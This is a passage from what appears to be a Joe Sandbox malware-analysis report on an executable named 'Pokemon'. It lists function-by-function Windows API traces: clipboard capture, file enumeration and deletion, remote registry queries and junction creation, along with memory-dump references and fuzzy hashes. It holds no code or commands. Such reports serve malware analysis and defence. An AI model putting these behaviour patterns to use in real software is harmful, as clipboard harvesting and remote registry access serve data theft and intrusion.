                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000F1691
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 000F1698
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000F16A1
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 000F16A8
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000F16B1
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 000F16B8
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 000F16C4
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 000F16CB
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1ADF: GetProcessHeap.KERNEL32(00000008,000F14FD,?,00000000,?,000F14FD,?), ref: 000F1AED
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,000F14FD,?), ref: 000F1AF4
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,000F14FD,?), ref: 000F1B03
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 693a11606c4d314b26925a0ea6e182d10ae26af580ab2efa11ffccecd69c497f
                                                                                                                                                                                                                                                                                      • Instruction ID: f23411827f243b25f0438c96635a0013bacf92606d630c837431af38ef80438a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 693a11606c4d314b26925a0ea6e182d10ae26af580ab2efa11ffccecd69c497f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34716AB2900209FBDB109FA4EC48FFEBBB8BF04710F184515FA15E65A0D7319956DBA0
                                                                                                                                                                                                                                                                                      Function 0010F55C Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • OpenClipboard.USER32(0012DCD0), ref: 0010F586
                                                                                                                                                                                                                                                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 0010F594
                                                                                                                                                                                                                                                                                      • GetClipboardData.USER32(0000000D), ref: 0010F5A0
                                                                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 0010F5AC
                                                                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0010F5E4
                                                                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 0010F5EE
                                                                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0010F619
                                                                                                                                                                                                                                                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 0010F626
                                                                                                                                                                                                                                                                                      • GetClipboardData.USER32(00000001), ref: 0010F62E
                                                                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0010F63F
                                                                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0010F67F
                                                                                                                                                                                                                                                                                      • IsClipboardFormatAvailable.USER32(0000000F), ref: 0010F695
                                                                                                                                                                                                                                                                                      • GetClipboardData.USER32(0000000F), ref: 0010F6A1
                                                                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0010F6B2
                                                                                                                                                                                                                                                                                      • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0010F6D4
                                                                                                                                                                                                                                                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0010F6F1
                                                                                                                                                                                                                                                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0010F72F
                                                                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0010F750
                                                                                                                                                                                                                                                                                      • CountClipboardFormats.USER32 ref: 0010F771
                                                                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 0010F7B6
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 420908878-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 3319831b620bc274873a63935bcf4652a6bef93b2742ae58a1a3584e6b9e214a
                                                                                                                                                                                                                                                                                      • Instruction ID: d189e10aafdbc8d024a8711b6b1267c11ddc38a29187485f8653ef21cc03853a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3319831b620bc274873a63935bcf4652a6bef93b2742ae58a1a3584e6b9e214a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A561E435204301AFD720EF20EC86F6A77A4AF84714F14456CF48687AE2DB71DD86CB62
                                                                                                                                                                                                                                                                                      Function 001073D4 Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00107403
                                                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00107457
                                                                                                                                                                                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00107493
                                                                                                                                                                                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 001074BA
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009B329: _wcslen.LIBCMT ref: 0009B333
                                                                                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 001074F7
                                                                                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00107524
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                                                                                                                                                      • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                                                                                                                                      • API String ID: 3830820486-3289030164
                                                                                                                                                                                                                                                                                      • Opcode ID: 9a1fd48138f2f25d8eb1c4687093f120170e04ca9e70b39fbb4d62aa4d7dc0a1
                                                                                                                                                                                                                                                                                      • Instruction ID: 036e3a00bafb35962c5706d6f7afd6195edd1aca7d168544bac74048da30c07b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9a1fd48138f2f25d8eb1c4687093f120170e04ca9e70b39fbb4d62aa4d7dc0a1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29D19072908304AFC700EBA4C885EBFB7ECAF89704F44491DF585D6292EB74EA44D762
                                                                                                                                                                                                                                                                                      Function 0010A087 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0010A0A8
                                                                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 0010A0E6
                                                                                                                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 0010A100
                                                                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0010A118
                                                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0010A123
                                                                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0010A13F
                                                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0010A18F
                                                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(00157B94), ref: 0010A1AD
                                                                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0010A1B7
                                                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0010A1C4
                                                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0010A1D4
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                                                                                                                                      • API String ID: 1409584000-438819550
                                                                                                                                                                                                                                                                                      • Opcode ID: b32db68b831cbef6664537b5799ab70c97c3e27a22e3bcedbfdbba1e14872262
                                                                                                                                                                                                                                                                                      • Instruction ID: 198bc752c94832380c7030c00bab6556ede723e36c9f7d73c1b5a16263d26a9e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b32db68b831cbef6664537b5799ab70c97c3e27a22e3bcedbfdbba1e14872262
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4631E47160071DBFDB20AFB4EC4AADE73ACAF04321F5001A5F855E20D0EBB0DE958A65
                                                                                                                                                                                                                                                                                      Function 00104763 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00104785
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 001047B2
                                                                                                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 001047E2
                                                                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00104803
                                                                                                                                                                                                                                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 00104813
                                                                                                                                                                                                                                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0010489A
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 001048A5
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 001048B0
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                                                                                                                                                                      • String ID: :$\$\??\%s
                                                                                                                                                                                                                                                                                      • API String ID: 1149970189-3457252023
                                                                                                                                                                                                                                                                                      • Opcode ID: 8134300e774f5b4daa54316b6bd6c6df30a4c74e6147c3749b8d0858a63fab1d
                                                                                                                                                                                                                                                                                      • Instruction ID: 4306a9f6f7810783b337b807f32cab439a92fb5af545582e3f08dc6804c4ff82
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8134300e774f5b4daa54316b6bd6c6df30a4c74e6147c3749b8d0858a63fab1d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5831B6B1500249ABDB21DFA0DC89FEB37BCEF89700F1040B6F649D60A1E77096958B64
                                                                                                                                                                                                                                                                                      Function 0010A1E2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0010A203
                                                                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0010A25E
                                                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0010A269
                                                                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0010A285
                                                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0010A2D5
                                                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(00157B94), ref: 0010A2F3
                                                                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0010A2FD
                                                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0010A30A
                                                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0010A31A
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FE399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 000FE3B4
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                                                                                                                                      • API String ID: 2640511053-438819550
                                                                                                                                                                                                                                                                                      • Opcode ID: b86866f92e0ade393f0bdf9b6115d7bdffaec1114e0efd688ef4bff2db4bbed6
                                                                                                                                                                                                                                                                                      • Instruction ID: ecfa253e74790856764cd92b95d9084066d41f0dd90ee5ff1248ba48e3c96cf3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b86866f92e0ade393f0bdf9b6115d7bdffaec1114e0efd688ef4bff2db4bbed6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2231013150071DBECB20AFA4EC09EDE77ADAF45321F5001A1E890A20E1DBB1DE958A11
                                                                                                                                                                                                                                                                                      Function 0011C8A4 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0011D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0011C10E,?,?), ref: 0011D415
                                                                                                                                                                                                                                                                                        • Part of subcall function 0011D3F8: _wcslen.LIBCMT ref: 0011D451
                                                                                                                                                                                                                                                                                        • Part of subcall function 0011D3F8: _wcslen.LIBCMT ref: 0011D4C8
                                                                                                                                                                                                                                                                                        • Part of subcall function 0011D3F8: _wcslen.LIBCMT ref: 0011D4FE
                                                                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0011C99E
                                                                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0011CA09
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0011CA2D
                                                                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0011CA8C
                                                                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0011CB47
                                                                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0011CBB4
                                                                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0011CC49
                                                                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0011CC9A
                                                                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0011CD43
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0011CDE2
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0011CDEF
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3102970594-0
                                                                                                                                                                                                                                                                                      • Opcode ID: ab75b4315f72ec796eb90f75a9ca2e24d78f9ffa82a5d55ef3eb0ca622aa9e63
                                                                                                                                                                                                                                                                                      • Instruction ID: 8af20f5a242d6c143232135168f5e9bef9f96792162d51a46ac784e52d8383b2
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ab75b4315f72ec796eb90f75a9ca2e24d78f9ffa82a5d55ef3eb0ca622aa9e63
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C9025371604200AFDB18DF28D895E6ABBE5FF49314F1884ADF449CB2A2D731ED46CB91
                                                                                                                                                                                                                                                                                      Function 000FD921 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00095851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000955D1,?,?,000D4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00095871
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FEAB0: GetFileAttributesW.KERNEL32(?,000FD840), ref: 000FEAB1
                                                                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 000FD9CD
                                                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 000FDA88
                                                                                                                                                                                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 000FDA9B
                                                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 000FDAB8
                                                                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 000FDAE2
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FDB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,000FDAC7,?,?), ref: 000FDB5D
                                                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000,?,?,?), ref: 000FDAFE
                                                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 000FDB0F
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                                                                                                                                                      • String ID: \*.*
                                                                                                                                                                                                                                                                                      • API String ID: 1946585618-1173974218
                                                                                                                                                                                                                                                                                      • Opcode ID: 7e4782bf626ebbb542fd243f80fcf498a379ba3b2744ab3887c61bc466cbd22c
                                                                                                                                                                                                                                                                                      • Instruction ID: a203afaa78b8614cd0d3f81116810b5a5877c84a5d833eaabe6396eddd48b4ab
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7e4782bf626ebbb542fd243f80fcf498a379ba3b2744ab3887c61bc466cbd22c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7615D3180514DEECF11EBE0DA929FDB7B6AF14310F2040A6E50277592EB316F4AEB61
                                                                                                                                                                                                                                                                                      Function 0010F7C7 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1737998785-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 224680bd9b42ef42a09308a3f5ad22260b0d17eea3e840ac5370ba5eab29a677
                                                                                                                                                                                                                                                                                      • Instruction ID: 351e9eaaba55d441f921dd782fd321c9f9abca2ec4b8247e843bea9eef2905c4
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 224680bd9b42ef42a09308a3f5ad22260b0d17eea3e840ac5370ba5eab29a677
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E3418B30604601EFD724CF15E889B55BBA0FF44318F15C0ADE8598BAA2CBB5ED82CB90
